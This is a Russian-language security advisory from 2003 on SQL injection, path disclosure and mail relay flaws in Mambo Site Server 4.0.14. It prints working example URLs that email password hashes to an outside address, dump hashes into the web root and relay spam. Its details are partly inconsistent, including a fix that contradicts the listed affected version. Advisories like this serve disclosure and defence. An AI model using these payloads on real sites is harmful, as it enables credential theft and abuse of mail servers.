Множественные уязвимости в Mambo Site Server

Дата публикации:
22.09.2003
Всего просмотров:
2331
Опасность:
Критическая
Наличие исправления:
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Уязвимые версии: Mambo Site Server 4.0.14

Описание: Несколько уязвимостей обнаружено в Mambo Site Server. Удаленный пользователь может выполнить произвольные SQL команды на основной базе данных. Удаленный пользователь может раскрыть инсталляционный путь.

Mambo не проверяет параметр '$id' в сценарии "banners.php" и параметр “bid” в сценарии banners.php. Если целевая система использует MySQL 4.x, то удаленный пользователь может представить специально обработанный URL, который заставит целевую систему отправить по почте хеши паролей. Пример (отправляет хеш MD5 паролей для пользователя с id =1):

 
http://localhost/mambo/emailfriend/emailarticle.php?
submit=submit&email=lifofifo@hackingzon 
e.org&youremail=webmaster@hackingzone.org&id=100
UNION select username,email,password from mos_users where id=1
Также удаленный пользователь может выполнить произвольные SQL команды на целевом сервере:
http://localhost/mambo/banners.php?op=click&bid=100 UNION select password from 
mos_users where 1=1 into outfile 'c:/apache2/htdocs/mos.txt'
Также сценарий 'contact.php' может использоваться для трансляции анонимных почтовых сообщений. Пример:
http://localhost/mambo/contact.php?op=sendmail&text=this is 
spam&from=none&name=Admin&email_to=lifofifo@hackingzone.org&sitename=ha&

URL производителя:http://www.mamboserver.com/

Решение: Mambo 4.0.14 не уязвим к неавторизованному релею почты: http://prdownloads.sourceforge.net/mambo/MamboV4.0.14.tar.gz. В качестве временно решения проблемы, используйте базу данных MySQL 3.x, которая не уязвима к нападениям SQL инъекции.

Ссылки: Several Mambo 4.0.14 Stable Exploits

или введите имя

CAPTCHA